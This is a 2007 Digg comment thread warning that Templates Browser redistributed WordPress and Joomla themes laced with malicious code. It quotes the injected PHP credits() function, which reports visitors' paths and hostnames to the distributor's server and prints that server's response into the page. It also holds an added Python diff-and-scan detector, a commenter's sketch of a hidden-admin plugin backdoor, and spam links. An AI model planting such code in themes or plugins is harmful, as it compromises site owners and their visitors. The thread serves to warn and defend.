WARNING! WordPress & Joomla; your theme might have malicious code
5thirtyone.com — Templates Browser is re-distributing WordPress & Joomla blog themes which contain hidden spam and malware / phishing links. If you've downloaded a theme from Templates Browser, check your source code and re-download the theme(s) from the original author(s).
- 620 diggs
- Mc_Carter, on 10/10/2007, -17/+37 too bad no one ever sees wordpress themes because the sites go down after five diggs.
- NinjaBoy, on 10/10/2007, -3/+27 I hate this generalization. My site has survived several diggs without a hiccup. People don't see sites hosted on ***** ass servers.
- jcaino, on 10/10/2007, -7/+2 i've witnessed digg traffic take down a wordpress site on a dedicated server that was only hosting said website.
intel dual core 3.6Ghz w/ 4GB of ram.
there are tweaks and things one can adjust (using caching, for one) to help wordpress get by, however, in extreme cases, it will still die.
- Burn, on 10/10/2007, -6/+2 Ahh so it was a P4, that would be why ;)
- NinjaBoy, on 10/10/2007, -0/+8 It's really about the number of DB calls your site makes. If every user takes 40 DB calls to render the page it's going down way faster than one making 6.
- apotropaic, on 10/10/2007, -1/+4 It's a good observation of wordpress sites overall, most are hosted on ***** ass server as you say, and even then some still go down on dedicated servers. You say it's all about the number of calls you make to the DB (duh!) but what you aren't mentioning is that a very small % of wordpress users even know what the word optimization means! So if your wordpress site didn't go down on a digg effect, grats, but I can't say that's the norm.
- Ashex, on 10/10/2007, -0/+13 That's a myth, the primary reason that wordpress blogs go down is because the huge amount of database requests crash mysql, if it isn't that, it's because every time the page is loaded, wordpress generates the page from scratch every time. Using a couple simple plugins, such as wp-cache will easily prevent this, along with enabling the built-in cache feature in wordpress.
I've done these things to prevent my site from going down in the event that it gets dugg, I'm fairly confident it won't
- ThirdPrize, on 10/10/2007, -0/+3 That sounds like fighting talk.
- igeoffi, on 10/10/2007, -4/+10 Template Browsers has been taken down.
- NinjaBoy, on 10/10/2007, -4/+11 ok if you want a wordpress theme try going to http://themes.wordpress.org
- NinjaBoy, on 10/10/2007, -1/+17 http://themes.wordpress.net/ is what i meant. But i hit edit and the script froze up and by the time i got the page reloaded the post was final. Ugh i hate the new digg comment system.
- kupa, on 10/10/2007, -2/+2 I always liked Sandbox; http://www.plaintxt.org/themes/sandbox/ -- it's a bit basic for those looking for pre-made fully done themes, but it's perfect for those who like to endlessly tweak their templates.
- visualweb, on 10/10/2007, -2/+2 Templates Browsers appears to be back up, perhaps a note to the domain registrar (namecheap) about their "best practices" might elicit some action.
- markwilcox, on 10/10/2007, -6/+5 One of the reasons I write and design my own.
- vannoy, on 10/10/2007, -1/+11 Well hello Mr. Fancy..
- koick, on 10/10/2007, -15/+4 WARNING! WordPress users, your site will crash if more than 2 people visit within an hour.
- abandonedhero, on 10/10/2007, -2/+6 WARNING DIGGERS! Making stupid comments WILL get you dugg down like this tosser.
- wisdomdigger, on 10/10/2007, -4/+0 There must be a way to look for the malicious codes in functions.php or anywhere in the template. That's sad news. I customarily use free templates for my Joomla sites, with some tweaking of course. Someone should think of ways how to remove those malicious codes.
- Figs, on 10/10/2007, -0/+8 Read the source code and see what it does?
- imablackguy, on 10/10/2007, -0/+2 The obvious response to this would be to not upload the extra functions.php/remove whatever additional call?
Someone should just do a quick diff against the original theme and the TB theme.
- rxbbx, on 10/10/2007, -1/+3 This took long.. i am surprised it never happened before..
- BlackCastle, on 10/10/2007, -5/+3 Just (2007/08/03 06:16 UTC) checked the theme I use: compared with the original author: yep, it's infected. Downloaded again from templatesbrowser: yes, still infected. Somebody know how to spell DDOS?
- phyzome, on 10/10/2007, -0/+0 If a whole bunch of Digg users held down CTRL-F5 while viewing the site, it could DDoS the site.
- DevDad, on 10/10/2007, -3/+1 I always wondered why they were paying for AdWords advertisements with no monetization on the site.
- hexydes, on 10/10/2007, -4/+3 Bah, that's why real men only make their templates from scratch. ;)
- imablackguy, on 10/10/2007, -0/+6 It calls this:
function credits()
{
    // Build a tracker URL that reports the visited path and the blog's hostname.
    $url = "http://1.templatesbrowser.com/wp.php?" .
        "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    // Only proceed if the remote host answers within 3 seconds.
    $check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
    if($check)
    {
        // Fetch the remote response and write it straight into the page output.
        @readfile($url);
        fclose($check);
    }
}
- lordatlas, on 10/10/2007, -8/+1 I hope Wank writes about it. - http://wank.wordpress.com
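Added example (not part of the original thread or of any theme's code): one way to carry out the diff imablackguy suggests and to flag the calls seen in the quoted credits() function. The function names, the indicator list and the tracker.example sample theme are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristics taken from the credits() snippet quoted in the thread (assumed list, not exhaustive).
INDICATORS = {
    "fsockopen": re.compile(r"\bfsockopen\s*\(", re.I),
    "readfile": re.compile(r"\breadfile\s*\(", re.I),
    "request-leak": re.compile(r"urlencode\s*\(\s*\$_SERVER\s*\[\s*['\"](?:HTTP_HOST|REQUEST_URI)", re.I),
}

def digest_tree(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare_themes(original, suspect):
    """Diff a re-distributed theme against the author's copy, then scan what differs."""
    good, bad = digest_tree(original), digest_tree(suspect)
    added = sorted(set(bad) - set(good))
    changed = sorted(f for f in set(bad) & set(good) if bad[f] != good[f])
    findings = []
    for rel in added + changed:
        if not rel.endswith(".php"):
            continue
        text = (suspect / rel).read_text(errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            findings += [(rel, lineno, name) for name, rx in INDICATORS.items() if rx.search(line)]
    return {"added": added, "changed": changed, "findings": findings}

def demo():
    """Run the comparison on two tiny constructed theme trees (sample data, not real themes)."""
    with tempfile.TemporaryDirectory() as tmp:
        orig, susp = Path(tmp, "original"), Path(tmp, "redistributed")
        for d in (orig, susp):
            d.mkdir()
            (d / "index.php").write_text("<?php get_header(); ?>\n")
        (orig / "footer.php").write_text("<?php wp_footer(); ?>\n")
        (susp / "footer.php").write_text("<?php wp_footer(); credits(); ?>\n")
        (susp / "functions.php").write_text(
            "<?php\nfunction credits() {\n"
            "  $url = 'http://tracker.example/wp.php?host=' . urlencode($_SERVER['HTTP_HOST']);\n"
            "  if (@fsockopen('tracker.example', 80, $e, $s, 3)) { @readfile($url); }\n}\n")
        return compare_themes(orig, susp)

if __name__ == "__main__":
    print(demo())
```

Any file listed under added or changed deserves a manual read even when no indicator fires, since the indicator list only covers the calls shown in the quoted snippet.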
- OBKenobi, on 10/10/2007, -6/+2 Coincidentally, check the Joomla site, there are a couple of very nice new templates released from Rockettheme and Yootheme.
- masonba2000, on 10/10/2007, -5/+4 I am in ur wordpress, malicizing your code
- depi, on 10/10/2007, -4/+1 If you are looking for free and good looking Wordpress themes you can also look here: http://wp-themes.erikgyepes.com
- shinon, on 10/10/2007, -2/+1 Does that mean it's malicious GPL code now?
- deathproof, on 10/10/2007, -2/+5 What is Malicious code? I'm sure I'll get dugg down for asking such a question instead of getting an answer.
- mtriper, on 10/10/2007, -0/+5 Dugg up for modesty!
http://en.wikipedia.org/wiki/Malicious_code
- zeejay, on 10/10/2007, -2/+1 Malicious code? From a generic site that lets you download installable code/freeware? No!!!
- redwallhp, on 10/10/2007, -1/+3 Uh, some of the best blogs on the web are Wordpress. Smashing Magazine is run off Wordpress, and you've seen all the diggs they get! I think those Wordpress devs need to get going and add wp-cache-like functionality to Wordpress instead of requiring a plugin. They should also improve the admin panel.
- xamox, on 10/10/2007, -3/+2 Good thing I use drupal.
- civperc, on 10/10/2007, -0/+3 lol have fun with that...
- Mar1in, on 10/10/2007, -1/+1 Yow! I can see the MPack crowd making malicious templates as yet another way to try to get established onto more PCs. MPack, if you don't know, is _commercial_ malware. The operators of an MPack site try to get their mal-links on google, basically anywhere they can, so that when people browsing the web hit on a mal-link they get infected. The infection allows the MPack operator to gather information off of the PC, in hopes of getting credit card #'s and banking information, etc.
- iapx, on 10/10/2007, -3/+0 Drupal, as Joomla and Wordpress use direct PHP code for its template, enabling anyone to forge malware, spyware or worse on the template itself, and they are both totally unsecure.
Any Drupal Module or Template could also request any data directly from the DB, including user accounts, and do whatever it wants to, and it's easy to hide in obfuscated uncommented code (as many templates and modules are!).
This is the unsafe way to do serious PHP Project
- headzoo, on 10/10/2007, -1/+2 You really don't know what kind of crazy code might be in those templates and plugins you're installing. They could easily create backdoors to give people access to your site. I could put out a plugin for WP that creates a full admin user, and emails me the URL to your blog, so I can then go log in and do whatever I want.
There's really a hundred different ways, but most people don't think twice when installing any ol' theme or plugin that they found on the web.
- isdereks, on 10/10/2007, -0/+2 This paranoia can be applied to anything that you find and download on the internet.
- trogdoor, on 10/10/2007, -0/+1 Can and should be.
- Sushubh, on 10/10/2007, -2/+1 oh i remember downloading a template from a recommended template source. it had 3 hidden links to adult sites. i complained to the wordpress people. they took down that template and made it a point to check all the templates for such links...
- Brajeshwar, on 10/10/2007, -1/+2 This sucks, I found my theme being re-distributed too without the credit and the malicious code in the "functions.php". I have done what I can to spread the word against downloading from TemplateBrowser - http://www.brajeshwar.com/2007/templatebrowser-is-pirating-your-wordpress-themes/
- seoluv, on 10/10/2007, -0/+1 Check it out.
Check your WordPress themes for malicious codes!
Aileen Apolo - Where Did Our SeoLuv Go ?
Google Country Consultant
Benj Arriola & The Crying Game
- seoluv, on 10/10/2007, -0/+1 http://www.yugatech.com/blog/seo/check-your-wordpress-themes-for-malicious-codes/
http://www.seoluv.com/aileen-apolo-where-did-our-seoluv-go/
http://www.google.com/search?hl=en&q=Google+Country+Consultant&btnG=Google+Search
http://www.seoluv.com/benj-arriola-the-crying-game/
- kabalyero, on 10/10/2007, -0/+0 I make my own themes and template. Check out my http://www.kabalyero.com WP Theme ;)
- and5rey, on 11/03/2007, -1/+0 If anyone is using my themes, feel free to download the original files from my site: http://www.wpmix.com/
- kureselisinma, on 12/24/2007, -0/+0 http://www.kuresel-isinma.org http://www.m-s-n.org http://www.biddinglinkdirectory.net http://www.globalwarmingvideos.org
- matu666, on 01/13/2008, -0/+1 the template browser site is down at its root domain but if you put /wordpress-themes after it you still get access to the WP themes
bad news
take this site down
I use Joomla myself
